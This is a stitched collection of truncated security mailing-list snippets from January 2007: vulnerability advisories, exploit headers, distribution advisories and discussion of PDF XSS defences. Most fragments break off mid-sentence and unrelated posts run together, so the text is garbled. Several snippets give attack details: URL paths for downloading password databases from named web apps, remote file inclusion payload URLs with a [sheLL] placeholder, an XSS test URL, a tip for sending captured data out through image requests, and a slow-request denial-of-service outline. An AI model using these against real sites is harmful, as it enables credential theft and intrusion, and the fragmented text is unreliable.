Hi,
I checked the code of 2.0 and 2.0.1 and tested it. There is no risk of Code
Injection.
If you are still unsure mail me.
I'd like to announce the availability of a free security reconnaissance /
firewall bypassing tool called 0trace. This tool enables the user to
perform hop enumeration (traceroute) within an established TCP
connection, such as an HTTP or SMTP session. This is opposed to sending
stray packets, as
On Sun, 7 Jan 2007, Michal Zalewski wrote:
[ Of course, I might be wrong, but Google seems to agree with my
assessment. A related use of this idea is 'firewalk' by Schiffman and
Goldsmith, a tool to probe firewall ACLs; another utility called
'tcptraceroute' by Michael C. Toren
#!/usr/bin/php
<?php
/**
 * This file requires the PhpSploit class.
 * If you want to use this class, the latest
 * version can be downloaded from acid-root.new.fr.
 **/
require("phpsploitclass.php");
/*/
|
| header @lex Guestbook = 4.0.2 Remote Command Execution Exploit
| header
AJLogin v3.5 Remote Password Disclosure Vulnerability
#Software: AJLogin
#Version: 3.5
#Download: http://www.randomravings.com/ajasp/dload.asp?file=4
#Found by: beks
#Risk: Medium
#http://[target]/[AJLogin_Path]/ajlogin.mdb
EMembersPro 1.0 Remote Password Disclosure Vulnerability
#Software: EMembersPro
#Version: 1.0
#Download: http://www.keyvan1.com/package/member.zip
#Found by: beks
#Risk: Medium
#http://[target]/[EMembersPro_Path]/users.mdb
MitiSoft Remote Password Disclosure Vulnerability
#Software: MitiSoft
#Download: http://aspindir.com/indir.asp?id=4536
#Found by: beks
#Risk: Medium
#http://[target]/[MitiSoft_Path]/access_MS/MitiSoft.mdb
HarikaOnline v2.0 Remote Password Disclosure Vulnerability
#Software: HarikaOnline
#Version: 2.0
#Download: http://aspindir.com/indir.asp?id=4563
#Found by: beks
#Risk: Medium
#http://[target]/[harikaonline_Path]/harikaonline.mdb
Webulas Remote Password Disclosure Vulnerability
#Software: Webulas
#Download: http://aspindir.com/indir.asp?id=4516
#Found by: beks
#Risk: Medium
#http://[target]/[Webulas_Path]/db/db.mdb
Uguestbook Remote Password Disclosure Vulnerability
#Software: Uguestbook
#Version: 1.0
#Download: http://www.uapplication.com/download/Uguestbook%20-%201.0.zip
#Found by: beks
#Risk: Medium
#http://[target]/[Uguestbook_Path]/mdb-database/guestbook.mdb
---
NUNE News Script (custom_admin_path) Remote File Include Vulnerability
---
Author: xoron
---
Code:
if (isset($custom_admin_path))
$special_admin_path =
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
- --
Debian Security Advisory DSA 1245-1[EMAIL PROTECTED]
http://www.debian.org/security/ Moritz Muehlenhoff
January 7th, 2006
James Landis wrote:
More notes on Amit's remediation algorithm:
Putting all of the identifying information into the token weakens the
defense because the attacker can mount known plaintext attacks against
it.
Not precisely. First, the classic definition of known plaintext
attacks is that an
# BhhGroup.Org Bilgi-Yonetimi.Org.Tr
# script name : Dayfox Blog
# Script Download : http://hotscripts.com/Detailed/66344.html
# Risk : High
# Found By : ShaFuck31
# Vulnerable file : index.php
#Vuln :
http://www.victim.com/ScriptPath/index.php?page=[sheLL]
On Thu, Jan 04, 2007 at 08:03:34PM +0100, Ben Bucksch wrote:
[...]
= Proposed fix =
The problem at hand could be easily fixed by letting the client check
out only in the current directory (or one specified by the user on the
commandline or GUI, preferences stored locally), no matter what
# BhhGroup.Org Bilgi-Yonetimi.Org.Tr
# script name : GeoBB Georgian Bulletin Board
# Script Download : http://hotscripts.com/Detailed/58100.html
# Risk : High
# Found By : ShaFuck31
# Vulnerable file : index.php
Vuln. Code:
require($action.'.php');
#Vuln :
Thor,
On 2007-01-05 Thor (Hammer of God) wrote:
You guys might want to put that on your web site. Probably somewhere
under Contact Us so that it is easy to, um, contact you specifically
for security issues.
[...]
Something like [EMAIL PROTECTED] may seem obvious, but it's better if
you list
TK53 Advisory #1 01/07/2007
- CenterICQ remote DoS buffer overflow in Livejournal handling
* Authors: Lolek of TK53 [EMAIL
This also works for the affected versions of Opera mentioned elsewhere
on the list (9.10, 8.54)...
-----Original Message-----
From: Martin O'Neal [mailto:[EMAIL PROTECTED]
Sent: 04 January 2007 17:59
To: bugtraq@securityfocus.com; [EMAIL PROTECTED]
Subject: RE: [WEB SECURITY] Universal XSS with
MkPortal Full Path Disclosure
Vulnerability discovered by: Demential
Web: http://headburn.altervista.org
E-mail: info[at]burnhead[dot]it
Mkportal website: http://www.mkportal.it
Tested on MKPortal M1.1 RC1 with PhpBB
other versions may also be affected.
A correction to my previous post: since THE_REQUEST looks like GET
/foo/bar/baz.pdf HTTP/1.0, the regex used needs to match the space between
pdf and HTTP, so this mod works better:
RewriteCond %{THE_REQUEST} .*\.pdf[^\wA-Za-z0-9._?%-]
Again, YMMV depending on what characters you expect to be
HP Multiple Products PML Driver Local Privilege Escalation
By Sowhat of Nevis Labs
2007.01.08
http://www.nevisnetworks.com
http://secway.org/advisory/AD20070108.txt
Vendor
Hewlett-Packard
Products Affected
HP All-In-One products
HP PSC 700 series
HP PSC 900 series
HP PSC 1100 series
HP PSC
# magic photo storage website Remote File Inclusion
# Vendor: http://www.scriptaty.net/magic-photo-storage-website.html
# Demo Site : http://www.turnkeydemos.info/demo/picstorage/
# Found By : k1tk4t -
I've just released an article about how the Quality Assurance phase of the
development cycle can incorporate security testing into a standard test plan,
and make it part of the regular testing cycle.
Writing Software Security Test Cases: Putting security test cases into your
test plan
Product: Packeteer PacketShaper
Model: 9500/ISP
Software: PacketWise 8.x (possibly others)
===
Background
===
Packeteer creates bandwidth management solutions such as the PacketShaper, which
is the ultimate scalable platform for optimized WAN application performance, the only
I just skimmed through your code very quickly and I noticed a single
problem. Don't send the captured data with another XHR (xhr2). Use
images.
var img = new Image();
img.src = url;
this should work.
On 1/4/07, T Biehn [EMAIL PROTECTED] wrote:
I'm trying to put together a demonstration of this
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
- --
Debian Security Advisory DSA 1246-1[EMAIL PROTECTED]
http://www.debian.org/security/ Martin Schulze
January 8th, 2007
also, you can use TinyURL to hide entire attack vectors. For example,
the following link contains a harmless exploit (alert message box) for
Google:
http://tinyurl.com/t8h4q
more about this issue here:
http://www.gnucitizen.org/blog/universal-pdf-xss-after-party/
On 1/4/07, Billy Hoffman [EMAIL
rPath Security Advisory: 2007-0001-1
Published: 2007-01-08
Products: rPath Linux 1
Rating: Major
Exposure Level Classification:
Indirect User Deterministic Unauthorized Access
Updated Versions:
openoffice.org=/[EMAIL PROTECTED]:devel//1/2.0.3-1.7-1
References:
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
-
Debian Security Advisory DSA-1247-1[EMAIL PROTECTED]
http://www.debian.org/security/ Noah Meyerhans
January 08, 2007
-
Interesting, but yet I don't see any possibility of an attack.
URL like
http://host/?user=xdfaerror=%3Cscript%3Ealert('hakin9')%3C/script%3E
is generated when user login failed and JES webmail server issued an HTTP
redirect
The webmail server itself will not issue URL like that unless the proxy
hello list,
the cisco network admission control system gives an administrator the
chance to check the clients, whether they have installed certain
patches / hotfixes. this check is not reliable.
program version: cisco trust agent 2.0.1.14 (probably all versions)
os: windows xp sp2
vendor
One possible work around on the server side:
Direct your web server to serve .pdf files as mime type
application/octet That way the files will be saved to
disk instead of opening in the browser plug in.
Firefox works fine with this, but depending upon which version of IE you
have (and
RSnake wrote:
The point is - someone with shared IP is vulnerable ONLY to an
attacker with the same IP. Which makes attacks much less generic and
much more painful. Rock solid it ain't, but I think it's a pretty
good band-aid until all (hmmm...) clients upgrade to Acrobat Reader 8.0.
-Amit
createauction (catid) Remote SQL Injection Vulnerability
HItamputih Crew
# hitamputih Advisory
# Discovered By : IbnuSina
#---
# Software: createauction
# Vendor :
thorben schroeder wrote:
the cisco network admission control system gives an administrator the
chance to check the clients, whether they have installed certain
patches / hotfixes. this check is not reliable.
This is a known vulnerability of any system of NAC which trusts a client
GForge Cross Site Scripting vulnerability
Version:Tested on GForge 4.5.11
Discovered by: José Ramón Palanco: jose.palanco(at)eazel(dot)es
http://www.eazel.es
Description:
GForge is vulnerable to a security vulnerability that allows Cross-Site
Scripting attacks. Due to improper
I'm quite confident that someone could develop a very secure
interpreted language.
That's a moot point, it's not about languages anymore, it's about
FRAMEWORKS on top of languages with security baked in.
In Java my team has one validation servlet that every request must go through
- so even if
: We frequently see requests for contact on this mailing list. Readers
: are encouraged to ensure that their software vendors are aware of the
: following documents, which have more specific guidelines for vendors to
: establish. Because these documents have been co-authored by major
:
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
___
Mandriva Linux Security Advisory MDKSA-2007:003
http://www.mandriva.com/security/
Updates:
1. In private communication, Tom Spector observed that the cookie
doesn't add any significant security. In retrospect, I could have
omitted it completely. It's there as a remnant of a previous idea I had.
In other words, I see nothing wrong with the following, simpler and more
2. While thinking more about this solution, I observed that if the attacker
can have an agent sharing the same IP address with the victim (by agent I
mean an entity that can communicate with the target web site and read back
its response data), then the algorithms I suggested will not be
RSnake wrote:
2. While thinking more about this solution, I observed that if the
attacker can have an agent sharing the same IP address with the
victim (by agent I mean an entity that can communicate with the
target web site and read back its response data), then the algorithms
I suggested
The point is - someone with shared IP is vulnerable ONLY to an attacker with
the same IP. Which makes attacks much less generic and much more painful.
Rock solid it ain't, but I think it's a pretty good band-aid until all
(hmmm...) clients upgrade to Acrobat Reader 8.0.
-Amit
Sorry for
Good day
Direct Link to Advisory
http://homepage.mac.com/adonismac/Advisory/steg/steganography.html
Affected Product
Steganography 1.7.1 and 1.8 (latest). http://www.securekit.com/hidefiles.htm
Bug Type and Date
=
Type: Bad Design
Date: 01/06/2007
Bug Results
On Wed, 3 Jan 2007, William A. Rowe, Jr. wrote:
Michal Zalewski wrote:
I feel silly for reporting this, but I couldn't help but notice that
Apache and IIS both have a bizarro implementation of HTTP/1.1 Range
header functionality (as defined by RFC 2616). Their implementations allow
the
i tried this with IE7 on Vista Ultimate, 45mins later and it's still working as
expected.
However I do get a javascript error: (Sorry had to retype it out)
Line: 0
Char: 0
Error: The following tags where not closed: foo, foo, foo, foo, foo, foo, foo,
foo, foo, foo, foo, foo, foo, foo, foo, foo,
On Friday, 5 January 2007, Thor (Hammer of God) wrote:
Something like [EMAIL PROTECTED] may seem obvious, but it's better if you
list specific contact info so it can be easily found.
I don't want to be rude but :
- [EMAIL PROTECTED] is the only standardized security contact (as
defined by
Dear All,
lfgnd La Fonera routers distributed by FON allow web access to
lfgnd unauthenticated users via DNS tunneling.
Have been in a Hotel recently? I think actually we should post those
that are NOT vulnerable to this rather than post those who are. Pun
intended.
--
http://secdev.zoller.lu
Folks,
Over the Christmas break I did quite a bit of work on the code and have
added a hardware abstraction layer that allows support for readers other
than the ACG, and to test it I've added limited support for the Frosch
Hitag reader.
New features in this release:
Program Hitag2 to
to kill is enough not to finish the request and let it timeout on server side.
no ddos/dos protection layers can stand against this attack (as far as i know)
and the scenario is simple
1. fingerprint the timeout on serverside
2. dig the sitemap from target
3. build a list of browsers to
Another similar option is to use a single-use random value (not
encrypted), that gets invalidated after it's served back.
You can save the random value on the (non persistent) session
(server-side), and serve the PDF only if the correct random value is
provided.
Once a random value has been
Guy Podjarny wrote:
Another similar option is to use a single-use random value (not
encrypted), that gets invalidated after it's served back.
You can save the random value on the (non persistent) session
(server-side), and serve the PDF only if the correct random value is
provided.
Once a